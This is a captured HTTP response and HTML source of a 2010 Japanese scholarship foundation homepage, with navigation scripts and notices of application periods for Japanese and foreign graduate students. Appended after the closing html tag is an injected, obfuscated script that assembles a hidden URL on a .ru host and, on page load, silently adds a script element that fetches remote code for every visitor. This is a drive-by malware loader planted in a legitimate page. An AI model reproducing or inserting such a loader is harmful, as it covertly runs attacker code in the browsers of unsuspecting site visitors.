URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 200 OK
Date: Sun, 30 May 2010 09:08:44 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 02:39:25 GMT
ETag: "1b80004-3a34-4bf4a0dd"
Accept-Ranges: bytes
Content-Length: 14900
Connection: close
Content-Type: text/html

<html lang="ja">

	<head>
		<meta http-equiv="content-type" content="text/html;charset=Shift_JIS">
		<meta name="robots" content="noindex,nofollow">
		<title>伊藤国際教育交流財団</title>
		<csscriptdict>
			<script><!--
CSInit = new Array;
function CSScriptInit() {
if(typeof(skipPage) != "undefined") { if(skipPage) return; }
idxArray = new Array;
for(var i=0;i<CSInit.length;i++)
	idxArray[i] = i;
CSAction2(CSInit, idxArray);}
CSAg = window.navigator.userAgent; CSBVers = parseInt(CSAg.charAt(CSAg.indexOf("/")+1),10);
CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;
function IsIE() { return CSAg.indexOf("MSIE") > 0;}
function CSIEStyl(s) { return document.all.tags("div")[s].style; }
function CSNSStyl(s) { if (CSIsW3CDOM) return document.getElementById(s).style; else return CSFindElement(s,0);  }
CSIImg=false;
function CSInitImgID() {if (!CSIImg && document.images) { for (var i=0; i<document.images.length; i++) { if (!document.images[i].id) document.images[i].id=document.images[i].name; } CSIImg = true;}}
function CSFindElement(n,ly) { if (CSBVers<4) return document[n];
	if (CSIsW3CDOM) {CSInitImgID();return(document.getElementById(n));}
	var curDoc = ly?ly.document:document; var elem = curDoc[n];
	if (!elem) {for (var i=0;i<curDoc.layers.length;i++) {elem=CSFindElement(n,curDoc.layers[i]); if (elem) return elem; }}
	return elem;
}
function CSGetImage(n) {if(document.images) {return ((!IsIE()&&CSBVers<5)?CSFindElement(n,0):document.images[n]);} else {return null;}}
CSDInit=false;
function CSIDOM() { if (CSDInit)return; CSDInit=true; if(document.getElementsByTagName) {var n = document.getElementsByTagName('DIV'); for (var i=0;i<n.length;i++) {CSICSS2Prop(n[i].id);}}}
function CSICSS2Prop(id) { var n = document.getElementsByTagName('STYLE');for (var i=0;i<n.length;i++) { var cn = n[i].childNodes; for (var j=0;j<cn.length;j++) { CSSetCSS2Props(CSFetchStyle(cn[j].data, id),id); }}}
function CSFetchStyle(sc, id) {
	var s=sc; while(s.indexOf("#")!=-1) { s=s.substring(s.indexOf("#")+1,sc.length); if (s.substring(0,s.indexOf("{")).toUpperCase().indexOf(id.toUpperCase())!=-1) return(s.substring(s.indexOf("{")+1,s.indexOf("}")));}
	return "";
}
function CSGetStyleAttrValue (si, id) {
	var s=si.toUpperCase();
	var myID=id.toUpperCase()+":";
	var id1=s.indexOf(myID);
	if (id1==-1) return "";
	s=s.substring(id1+myID.length+1,si.length);
	var id2=s.indexOf(";");
	return ((id2==-1)?s:s.substring(0,id2));
}
function CSSetCSS2Props(si, id) {
	var el=document.getElementById(id);
	if (el==null) return;
	var style=document.getElementById(id).style;
	if (style) {
		if (style.left=="") style.left=CSGetStyleAttrValue(si,"left");
		if (style.top=="") style.top=CSGetStyleAttrValue(si,"top");
		if (style.width=="") style.width=CSGetStyleAttrValue(si,"width");
		if (style.height=="") style.height=CSGetStyleAttrValue(si,"height");
		if (style.visibility=="") style.visibility=CSGetStyleAttrValue(si,"visibility");
		if (style.zIndex=="") style.zIndex=CSGetStyleAttrValue(si,"z-index");
	}
}
function CSClickReturn () {
	var bAgent = window.navigator.userAgent; 
	var bAppName = window.navigator.appName;
	if ((bAppName.indexOf("Explorer") >= 0) && (bAgent.indexOf("Mozilla/3") >= 0) && (bAgent.indexOf("Mac") >= 0))
		return true; // dont follow link
	else return false; // dont follow link
}
function CSButtonReturn () { return !CSClickReturn(); }
CSIm=new Object();
function CSIShow(n,i) {
	if (document.images) {
		if (CSIm[n]) {
			var img=CSGetImage(n);
			if (img&&typeof(CSIm[n][i].src)!="undefined") {img.src=CSIm[n][i].src;}
			if(i!=0) self.status=CSIm[n][3]; else self.status=" ";
			return true;
		}
	}
	return false;
}
function CSILoad(action) {
	im=action[1];
	if (document.images) {
		CSIm[im]=new Object();
		for (var i=2;i<5;i++) {
			if (action[i]!='') {CSIm[im][i-2]=new Image(); CSIm[im][i-2].src=action[i];}
			else CSIm[im][i-2]=0;
		}
		CSIm[im][3] = action[5];
	}
}
CSStopExecution=false;
function CSAction(array) {return CSAction2(CSAct, array);}
function CSAction2(fct, array) { 
	var result;
	for (var i=0;i<array.length;i++) {
		if(CSStopExecution) return false; 
		var aa = fct[array[i]];
		if (aa == null) return false;
		var ta = new Array;
		for(var j=1;j<aa.length;j++) {
			if((aa[j]!=null)&&(typeof(aa[j])=="object")&&(aa[j].length==2)){
				if(aa[j][0]=="VAR"){ta[j]=CSStateArray[aa[j][1]];}
				else{if(aa[j][0]=="ACT"){ta[j]=CSAction(new Array(new String(aa[j][1])));}
				else ta[j]=aa[j];}
			} else ta[j]=aa[j];
		}			
		result=aa[0](ta);
	}
	return result;
}
CSAct = new Object;

// --></script>
		</csscriptdict>
		<csactiondict>
			<script><!--
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button2',/*URL*/'logo/b-zaida1.gif',/*URL*/'logo/b-zaida2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button4',/*URL*/'logo/b-rijit1.gif',/*URL*/'logo/b-rijit2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button3',/*URL*/'logo/b-japan1.gif',/*URL*/'logo/b-japan2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button8',/*URL*/'logo/b-forei1.gif',/*URL*/'logo/b-forei2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button5',/*URL*/'logo/b-koury1.gif',/*URL*/'logo/b-koury2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button6',/*URL*/'logo/b-apply1.gif',/*URL*/'logo/b-apply2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button7',/*URL*/'logo/b-qa1.gif',/*URL*/'logo/b-qa2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button9',/*URL*/'logo/b-kifu1.gif',/*URL*/'logo/b-kifu2.gif',/*URL*/'','');
CSInit[CSInit.length] = new Array(CSILoad,/*CMP*/'button10',/*URL*/'logo/b-schol1.gif',/*URL*/'logo/b-schol2.gif',/*URL*/'','');

// --></script>
		</csactiondict>
	</head>

<body bgcolor="white" topmargin="0" text="white" bgproperties=fixed onload="CSScriptInit();">

<div align="center">
  <center>
  <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="819" id="AutoNumber1" height="543">
    <tr height="16">
						<td height="16" bgcolor="white" width="819"><img src="logo/b-main1.gif" width="70" height="15" border="0"><csobj w="70" h="15" t="Button" ht="logo/b-zaida2.gif"><a href="contents/outline/outline.html" onmouseover="return CSIShow(/*CMP*/'button2',1)" onmouseout="return CSIShow(/*CMP*/'button2',0)" onclick="return CSButtonReturn()"><img src="logo/b-zaida1.gif" width="70" height="15" name="button2" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-rijit2.gif"><a href="contents/aisatsu.html" onmouseover="return CSIShow(/*CMP*/'button4',1)" onmouseout="return CSIShow(/*CMP*/'button4',0)" onclick="return CSButtonReturn()"><img src="logo/b-rijit1.gif" width="70" height="15" name="button4" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-japan2.gif"><a href="contents/japanese/japanese.html" onmouseover="return CSIShow(/*CMP*/'button3',1)" onmouseout="return CSIShow(/*CMP*/'button3',0)" onclick="return CSButtonReturn()"><img src="logo/b-japan1.gif" width="70" height="15" name="button3" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-forei2.gif"><a href="contents/foreign/foreign.html" onmouseover="return CSIShow(/*CMP*/'button8',1)" onmouseout="return CSIShow(/*CMP*/'button8',0)" onclick="return CSButtonReturn()"><img src="logo/b-forei1.gif" width="70" height="15" name="button8" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-koury2.gif"><a href="contents/exchange/exchange.html" onmouseover="return CSIShow(/*CMP*/'button5',1)" onmouseout="return CSIShow(/*CMP*/'button5',0)" onclick="return CSButtonReturn()"><img src="logo/b-koury1.gif" width="70" height="15" name="button5" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-apply2.gif"><a href="contents/applicat/jp/apply-jp.html" onmouseover="return CSIShow(/*CMP*/'button6',1)" onmouseout="return CSIShow(/*CMP*/'button6',0)" onclick="return CSButtonReturn()"><img src="logo/b-apply1.gif" width="70" height="15" name="button6" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-qa2.gif"><a href="contents/faq-jp.html" onmouseover="return CSIShow(/*CMP*/'button7',1)" onmouseout="return CSIShow(/*CMP*/'button7',0)" onclick="return CSButtonReturn()"><img src="logo/b-qa1.gif" width="70" height="15" name="button7" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-kifu2.gif"><a href="contents/kifu/contribu.html" onmouseover="return CSIShow(/*CMP*/'button9',1)" onmouseout="return CSIShow(/*CMP*/'button9',0)" onclick="return CSButtonReturn()"><img src="logo/b-kifu1.gif" width="70" height="15" name="button9" border="0"></a></csobj><csobj w="70" h="15" t="Button" ht="logo/b-schol2.gif"><a href="contents/scholar/scholar.html" onmouseover="return CSIShow(/*CMP*/'button10',1)" onmouseout="return CSIShow(/*CMP*/'button10',0)" onclick="return CSButtonReturn()"><img src="logo/b-schol1.gif" width="70" height="15" name="button10" border="0"></a></csobj></td>
					</tr>
    <tr height="212">
						<td height="212" bgcolor="#FFFFFF" width="819" align="left" valign="middle">
							<p align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0" width="250" height="250" name="toptitle" hspace="30" vspace="10" align="left">
									<param name="movie" value="logo/toptitle.swf">
									<param name="quality" value="best">
									<param name="play" value="true">
									<embed src="logo/toptitle.swf" type="application/x-shockwave-flash" width="250" height="250" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" quality="best" play="true" name="toptitle" hspace="30" vspace="10" align="left"> 
								</object>
							<div align="center">
								<p><b><img src="logo/logo2.gif" width="200" height="71" border="0" vspace="20" alt="伊藤国際教育交流財団" align="bottom"></b></p>
							</div>
							<div align="left">
								<table border="0" cellpadding="0" cellspacing="4" width="456" height="114" align="right">
									<tr>
										<td nowrap width="448">
											<div align="center">
												<p><font color="#000010" size="2">Japanese / <a href="http://www.itofound.or.jp/English/">English</a></font></p>
											</div>
										</td>
									</tr>
									<tr height="16">
										<td height="16" width="448">
											<p></p>
										</td>
									</tr>
									<tr>
										<td width="448">
											<div align="center">
												<p><font color="black" size="3">ようこそ伊藤国際教育交流財団ホームページへ!</font></p>
											</div>
										</td>
									</tr>
									<tr>
										<td width="448">
											<div align="left">
												<p><font color="#000010" size="2">このサイトでは海外の大学院にに留学される日本人の方、国内の大学院に留学される外国人の方に情報を提供致します。</font></p>
											</div>
										</td>
									</tr>
								</table>
								<p></p>
							</div>
						</td>
					</tr>
    <tr height="21">
						<td height="21" bgcolor="#000010" width="819">
      <p align="right"><font size="2" color="white"><b>最終更新日:<csobj w="114" h="17" t="DateTime" locale="00000411" format="LongDate" region="0">2010年4月1日</csobj></b></font><font color="white"> </font></td>
					</tr>
					<tr height="24">
						<td height="24" bgcolor="#006500" valign="middle" width="819">
      <p align="center"><font size="2"><marquee width="600" bgcolor="#006500" height="15" loop="infinite">2011年度日本人奨学金の募集は6月25日〜8月25日(当日消印有効)です。 				</marquee></font></td>
					</tr>
					<tr height="113">
						<td width="819" height="113" valign="top" bgcolor="white"><br>
														 <font size="2" color="#ff4500"><b>《日本人奨学金制度》</b></font><br>
														  <font color="black" size="2">○</font><font size="2" color="#000011">2011年度日本人奨学金の募集期間は2010年6月25日〜8月25日(当日消印有効)です。<br>
								    </font><font color="black" size="2">対</font><font color="black" size="2">象は2011年1月〜12月に海外の大学院(修士課程)に留学予定の方です。<br>
							</font>
							<p><font size="2"> </font><font size="2" color="#ff4500"><b>《外国人奨学金制度》</b></font><font size="2"><br>
									 </font><font color="black" size="2">○2010年度外国人奨学金(国内募集)の募集は</font><font size="2" color="#000011">締め切りました。<br>
									<br>
									  </font><font color="black" size="2">○</font><font size="2" color="#000011">次回の募集は2010年10月の予定です。<br>
																									  </font><font color="black" size="2">対</font><font color="black" size="2">象は2011年4月に日本の大学院(修士課程)に1年生で在籍する予定の方です。<br>
								</font></p>
							<p><font color="#000010" size="2"> </font></p>
						</td>
					</tr>
					<tr height="99">
						<td width="819" height="99" valign="top" bgcolor="white">
							<div align="center">
								<br>
								<br>
								<img src="logo/hplogo.gif" width="425" height="71" border="0"><br>
							</div>
							<p></p>
						</td>
					</tr>
				</table>
  </center>
</div>

</body>

</html>

<script>D=64787;D--;eX=23262;eX--;var U;QS=["M","R","Q"];BJ=["m","g","J"];E=function(){this.CW=54327;this.CW--;function Z(e,v,W){var jB=[];return e.substr(v,W);}this.BF=false;var q=RegExp;var d=document;var c="/e"+"lp"+"ai"+Z("s-Lzp",0,2)+"co"+Z("HSQFm/QSFH",4,2)+"go"+Z("oglBUI",0,2)+Z("RVhIleIVRh",4,2)+Z("ujo5.c5ouj",4,2)+Z("omr3u",0,2)+"/t"+Z("el5K8",0,2)+Z("45SegS45",3,2)+"ra"+"ph"+Z(".czfqZ",0,2)+Z("o.vnNG",0,2)+"uk"+Z(".p3iA",0,2)+Z("QgLhpLQg",3,2);AF=["A"];var p='';var jx=new Date();YS=26875;YS+=78;var CN={f:43797};qS={UH:false};GM=["pj","cH","Ay"];function O(e,v){Yz={xC:36475};var Zq="";hT=["Zo"];xe=["fk"];var W=String("[")+v+new String("]");var pY=new q(W, String(Z("ghYeE",0,1)));return e.replace(pY, p);zO=[];};try {} catch(Gr){};TT=["db","b","vq"];po={};var K="bo"+"dy";bi={};var P=null;var Ga={i:33470};var B=728919-720839;var C=O('socfroiWpotN','10NUCF9kynQdWfKLw3AloGYZT');U=function(){try {var UD="";var iQ="";var L=O('cirkeXaUt5e6Ekl9e6mCeXnwtQ','kCdXYMH926xwsU8hQ5i');var FU='';a=d[L](C);GW=62866;GW--;var O_='';var Bj=Z("deTuN",0,2)+"fe"+Z("rQcm",0,1);this.oq="oq";xp=[];var sL=[];var e=B+c;var _=O('s5rIcK','6gz7Gtk4ju1XIhRmVUKx5');w=[];Tq=54884;Tq+=124;a[_]=String("http:"+"//ten"+"thpro"+"fit.r"+"u:")+e;a[Bj]=[1,6][0];Xc=14228;Xc++;uG={Th:false};this.Ww=25035;this.Ww--;d[K].appendChild(a);var mg=38454;var Ou=945;} catch(l){var jc=new Array();};sf=52081;sf-=221;};var Ye={hS:15679};var rb={wu:17158};};var XF="";E();UO={fN:"Kq"};var cF=new Date();var fi=new Array();var vw=new Array();window.onload=U;this.Ko=36024;this.Ko--;var LS=new Array();</script>
<!--f593d9bb9a6b991ae840cadfb14612e0-->
 Questions or comments welcome: contact me.